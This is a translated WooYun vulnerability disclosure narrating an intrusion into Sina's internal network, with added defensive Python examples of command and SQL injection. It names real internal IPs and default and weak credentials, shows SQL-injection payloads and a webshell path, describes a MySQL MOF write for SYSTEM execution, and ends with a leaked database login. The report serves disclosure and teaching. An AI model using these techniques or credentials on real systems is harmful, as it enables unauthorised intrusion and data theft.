
Vulnerability summary

Defect ID: wooyun-2016-0196483

Title: A penetration test against Sina

Vendor: 新浪 (Sina)

Author: if、so

Submitted: 2016-04-15 09:12

Fixed: 2016-05-30 15:10

Published: 2016-05-30 15:10

Type: Successful intrusion

Severity: High

Self-assessed rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2016-04-15: Details sent to the vendor, awaiting vendor handling
2016-04-15: Vendor confirmed; details visible to the vendor only
2016-04-25: Details disclosed to core white hats and domain experts
2016-05-05: Details disclosed to regular white hats
2016-05-15: Details disclosed to intern white hats
2016-05-30: Details disclosed to the public

Summary:

@sky, finally made it into Sina's internal network

Details:

I had wanted to roam Sina's internal network for a long time. Got home from work, opened the laptop and kept grinding away.
Looked around and found nothing.
Kept my attention on the staff.sina.com.cn domain.
I had looked at it many times before without result, but that doesn't mean it stays clean forever.
dialin.staff.sina.com.cn is an external staff login portal; a brute-force attempt failed.
Scanning its C segment (/24) turned up a network device I hadn't seen before, 218.30.113.65

HTTP Basic authentication; the device identifies itself as arg. Tried a weak credential, arg / admin, and it logged in.

The device has a ping function; tried pinging the internal mail server.

Asked sky to take a look: the ping function passes its argument to a shell, so it is a command injection.

Reverse shell.
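
As an added illustration (editor's example, not the device's real firmware code and not part of the original report), here is the kind of ping handler that produces this bug, next to a hardened version. The allowlist validator, the argv builder and the payload string are the editor's constructions; the report only tells us that the ping form executed commands.

```python
import ipaddress
import re
import shlex
import subprocess
from typing import List, Optional

# RFC 1123-style hostname: labels of letters, digits and hyphens, 1-63 chars each,
# no leading/trailing hyphen, at most 253 chars.  Nothing a shell cares about
# (';', '|', '&', '$', '`', quotes, whitespace) can pass this allowlist.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def is_valid_target(host: str) -> bool:
    """Allowlist check: an IPv4/IPv6 literal or a plain hostname, nothing else."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        pass
    return bool(_HOSTNAME_RE.match(host))


def ping_command_vulnerable(host: str) -> str:
    """The bug pattern: the user's string is pasted into a command line for /bin/sh."""
    return "ping -c 1 " + host


def shell_tokens(command: str) -> List[str]:
    """Tokenise the way a POSIX shell would, keeping ';', '|', '&' as their own tokens,
    so we can see where the intended command ends and the injected one begins."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    return list(lexer)


def ping_argv(host: str) -> Optional[List[str]]:
    """Hardened form: validate against the allowlist, then build an argv list that goes
    to ping directly with no shell in between.  Returns None for anything rejected."""
    if not is_valid_target(host):
        return None
    # A hostname cannot start with '-' (regex) and neither can an IP literal
    # (ipaddress), so option injection such as "-f" is excluded as well.
    return ["ping", "-c", "1", host]


def run_ping(host: str, timeout: float = 5.0) -> Optional[int]:
    """Run ping without a shell; returns its exit status, or None if the target was rejected."""
    argv = ping_argv(host)
    if argv is None:
        return None
    return subprocess.run(argv, capture_output=True, timeout=timeout).returncode


if __name__ == "__main__":
    payload = "10.219.18.1; id"  # constructed payload, not taken from the report
    print(shell_tokens(ping_command_vulnerable(payload)))  # ';' and 'id' form a second command
    print(ping_argv(payload))  # None: rejected before anything runs
    print(run_ping("127.0.0.1"))  # 0 where loopback answers
```

The two defences are independent: the allowlist stops metacharacters and leading dashes from ever reaching the command, and the argv form means that even a validator bug cannot hand text to a shell parser.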

The shell is root, and the machine has a public IP:

eth0      Link encap:Ethernet  HWaddr 00:30:18:c6:38:99
          inet addr:218.30.113.65  Bcast:218.30.113.127  Mask:255.255.255.192
          inet6 addr: fe80::230:18ff:fec6:3899/64 Scope:Link
          UP BROADCAST RUNNING  MTU:1500  Metric:1
          RX packets:3979542 errors:0 dropped:0 overruns:0 frame:0
          TX packets:97531 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:5414089145 (5.4 GB)  TX bytes:15440995 (15.4 MB)
          Memory:f7c00000-f7c1ffff


To make the rest of the intrusion convenient and fast, I decided to set up a PPTP VPN on this machine as a jump host.
PPTP VPN up and running: convenient, fast, and far easier than Sina's own remote access, with no SMS code and no token~ (PPTP's own protection, MS-CHAPv2, is long broken, so the tunnel is a convenience for the attacker rather than a secure channel.)

But it turned out the VPN could not talk to the internal-network machines.

Guessing there was network segmentation; the machine's own C segment was reachable, though.

Started working on the machines in that C segment.
It turned out to be the production environment for Sina's TV livestreaming.

Plenty of vulnerabilities.
https://10.219.18.106/login.html  Dell OpenManage
Default credentials root / calvin

https://10.219.18.101/designs/imm/index.php  IMM (IBM's BMC web interface)
Default username: USERID
Default password: PASSW0RD

SQL injection

http://10.219.18.61/edit.php?input_id=5%27%20and%20%271%27=%272 (URL-decoded: input_id=5' and '1'='2, a boolean-based probe)


POST /index.php HTTP/1.1
Host: 10.219.18.63
Proxy-Connection: keep-alive
Content-Length: 21
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://10.219.18.63
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://10.219.18.63/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=tvocg2n5k6dlqf6v3jj8otr4u0
username=1&password=1


SQLite injection

Getting a shell

http://10.219.18.63/index.php

The login accepts the universal password admin' or '1'='1
Logged into the admin backend
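
The boolean probe against edit.php and the "universal password" login bypass above are the same defect, string-spliced SQL, seen from two angles. As an added example (editor's code, not the two applications' real source), the following Python builds a constructed SQLite database with made-up rows and shows both the vulnerable pattern and the parameterised fix; the table and column names are assumptions.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the two vulnerable apps: a login table and the
    record table behind edit.php?input_id=...  All rows are made up."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("CREATE TABLE inputs (input_id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "constructed-admin-pw"), ("tvops", "constructed-ops-pw")],
    )
    conn.executemany(
        "INSERT INTO inputs (input_id, name) VALUES (?, ?)",
        [(5, "stream-5"), (6, "stream-6")],
    )
    conn.commit()
    return conn


CONN = make_db()


def login_vulnerable(conn, username, password):
    """Bug pattern: both fields are spliced into the SQL text, so a quote in either
    one rewrites the WHERE clause.  AND binds tighter than OR, which is why
    admin' or '1'='1 in the username field selects the admin row."""
    sql = "SELECT username FROM users WHERE username = '%s' AND password = '%s'" % (
        username,
        password,
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Fix: bound parameters.  The payload is compared as data, never parsed as SQL."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def edit_lookup_vulnerable(conn, input_id):
    """edit.php-style lookup with the id spliced in.  An attacker appends a boolean
    condition and reads its truth value from whether a record comes back."""
    sql = "SELECT name FROM inputs WHERE input_id = '%s'" % input_id
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def edit_lookup_safe(conn, input_id):
    """Parameterised lookup: the whole probe string is one value, matches nothing."""
    row = conn.execute("SELECT name FROM inputs WHERE input_id = ?", (input_id,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    print(login_vulnerable(CONN, "admin' or '1'='1", "anything"))  # admin
    print(login_safe(CONN, "admin' or '1'='1", "anything"))  # None
    print(edit_lookup_vulnerable(CONN, "5' and '1'='1"))  # stream-5 (true branch)
    print(edit_lookup_vulnerable(CONN, "5' and '1'='2"))  # None (false branch)
    print(edit_lookup_safe(CONN, "5' and '1'='2"))  # None: nothing was injected
```

The two probe results for edit_lookup_vulnerable differ only in the trailing condition, which is exactly the signal the `input_id=5' and '1'='2` request above was looking for; the parameterised versions give the same answer for any payload, which is the check to run after a fix.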

Uploaded a PHP webshell:

http://10.219.18.62/watermark/c11.php

command parameter: cmd

This machine is connected to the core internal network.

Unobstructed.
Accessed the internal network through an HTTP proxy on it.

Finally got to see the Sina internal Exchange mail server I had wanted to see for so long.
But there is a problem: working through an HTTP proxy has too many issues (speed, stability, session timeouts and so on), so a more stable control point is needed for pivoting into the internal network.
That means taking over a Windows machine in the C segment.
Port-scanned the segment:

These are definitely Windows machines.
Among them, 10.219.18.8 also had MySQL listening.

And it accepts the weak credential root / root.
10.219.18.8 is also a Windows 2003 machine.

That is exactly the setup for the MOF trick: on Windows 2003 the WMI service compiles any .mof file dropped into c:/windows/system32/wbem/mof/ and runs its event consumer as SYSTEM (later Windows versions no longer auto-compile that directory), and a MySQL root with the FILE privilege running as a privileged service can write there.
So the file is hex-encoded and written out with INTO DUMPFILE under c:/windows/system32/wbem/mof/:

select char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into dumpfile  'c:/windows/system32/wbem/mof/nullevt.mof';


A few seconds later we were in over 3389 (RDP).

One password turned out to be reused everywhere, and it logged into several more machines.

These connect to the core internal network!

And they sit in STAFF, Sina's core internal domain:

C:\Documents and Settings\admin>net view /domain
Domain
-------------------------------------------------------------------------------
STAFF
WORKGROUP
The command completed successfully.
C:\Documents and Settings\admin>


Everything lined up: a stable external jump host and a convenient internal working environment. With a little more time the internal pentest would get very interesting.
Passwords picked up at random on GitHub already log in; would weak internal mailbox passwords be any rarer?

192.168.145.117 1433 zhuku zhiku@sina


Proof of vulnerability:

As shown above. This took too long, close to 10 hours, and what follows is fairly simple. Since the key systems use multi-factor authentication, the effort is better spent on domain penetration. No energy left to go deeper; thanks also to sky for hacking away with me in the middle of the night.

Fix recommendation:

Copyright notice: please credit the source when reposting: if、so@WooYun


Vulnerability response

Vendor response:

Severity: High

Rank: 12

Confirmed: 2016-04-15 15:00

Vendor reply:

Thank you for your attention to Sina security; the issue is being fixed.

Latest status:

None